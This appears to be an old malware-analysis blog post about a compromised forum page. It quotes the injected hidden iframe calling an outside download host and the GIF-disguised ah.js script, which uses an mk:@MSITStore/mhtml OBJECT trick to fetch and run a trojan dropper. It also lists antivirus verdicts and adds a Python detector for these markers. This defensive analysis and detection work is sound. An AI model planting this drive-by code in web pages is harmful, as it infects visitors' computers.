Yet Another Infected Web Page


Original by endurer

2006-04-08, No. 1

Web page: hxxp://www.***ai49.com/bbs/reg.asp

Code was inserted in 2 places: <iframe height=0 width=0 src="hxxp://down.***gament.net/q/f"></iframe>

The code at hxxp://down.***gament.net/q/f is:



<script language="javascript" src="ah.js"></script>  

The code of ah.js is:

 GIF89a
var GIF89a=document.location.href;GIF89a=GIF89a.substring(0,GIF89a.lastIndexOf('/'));document.write('<OBJECT Width=0 Height=0 style="display:none;" type="text/x-scriptlet" data="mk:%40MSITStore%3Amhtml%3Ac%3A//%2Emht%21'+GIF89a+'%2f1.js::/%23"></OBJECT>'); 


 

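ah.js masquerades as a GIF file, and downloads and runs 1.js.
1.js is actually a CHM file that drops and runs an .exe file. Kaspersky reports it as Trojan-Downloader.Win32.Delf.aet, and Rising reports it as Trojan.DL.Small.hm.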

File: 1.js
Status: INFECTED/MALWARE
MD5: 617449ed78325096128e604f1e9f9d30
Packers detected: -

Scanner results:
AntiVir: Found Heuristic/Trojan.Downloader (probable variant)
ArcaVir: Found Trojan.Downloader.Delf.Aet
Avast: Found nothing
AVG Antivirus: Found nothing
BitDefender: Found Trojan.Html.Gamect.A, Trojan.Downloader.Delf.AET
ClamAV: Found Exploit.HTML.ObjCode-2
Dr.Web: Found Exploit.CodeBase, Trojan.DownLoader.6966
F-Prot Antivirus: Found HTML/ObjCode@expl
Fortinet: Found nothing
Kaspersky Anti-Virus: Found Trojan-Downloader.Win32.Delf.aet
NOD32: Found Win32/TrojanDownloader.Small.AAO, Win32/TrojanDownloader.Delf.AET
Norman Virus Control: Found nothing
UNA: Found nothing
VirusBuster: Found nothing
VBA32: Found Trojan-Downloader.Win32.Delf.aet
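
The three markers described in this post (a zero-size iframe, a script file that begins with the GIF89a signature, and an OBJECT data value that URL-decodes to the mk:@MSITStore / mhtml: handlers) can be checked for when triaging a saved page. This is an added example, not part of the original post; the function names, thresholds and sample inputs are constructed for illustration.

```python
import re
from urllib.parse import unquote

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
# height/width set to exactly 0 (quoted or not), not 0.5, 00 or 0%
ZERO_DIM_RE = re.compile(r"\b(height|width)\s*=\s*[\"']?0(?![\d.%])", re.I)
# Protocol handlers that appear in the OBJECT data attribute on this page
HANDLER_RE = re.compile(r"mk:@msitstore|mhtml:", re.I)
GIF_MAGIC = (b"GIF87a", b"GIF89a")
SCRIPT_HINTS = (b"document.", b"var ", b"function")

# Constructed, non-functional samples modelled on the snippets quoted above
SAMPLE_HTML = '<p>reg</p><iframe height=0 width=0 src="hxxp://frame.example.invalid/q/f"></iframe>'
SAMPLE_JS = (b" GIF89a\nvar GIF89a=document.location.href;"
             b"document.write('<OBJECT data=\"mk:%40MSITStore%3Amhtml%3APLACEHOLDER\"></OBJECT>');")


def hidden_iframes(html):
    """Return iframe tags that declare both height=0 and width=0."""
    hits = []
    for tag in IFRAME_RE.findall(html):
        dims = {m.group(1).lower() for m in ZERO_DIM_RE.finditer(tag)}
        if dims == {"height", "width"}:
            hits.append(tag)
    return hits


def gif_disguised_script(body):
    """True if the body starts with a GIF signature but continues as script text."""
    data = body.lstrip()
    if not data.startswith(GIF_MAGIC):
        return False
    rest = data[6:]
    if not rest:
        return False
    # A real GIF carries binary header bytes here; script text is almost all printable.
    printable = sum(1 for b in rest if 32 <= b < 127 or b in (9, 10, 13))
    return printable / len(rest) > 0.95 and any(h in rest for h in SCRIPT_HINTS)


def handler_uris(text):
    """Return handler names visible after bounded, repeated URL-decoding."""
    decoded = text
    for _ in range(3):  # the page encodes '@' and ':' as %40 and %3A
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return sorted({m.group(0).lower() for m in HANDLER_RE.finditer(decoded)})
```
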
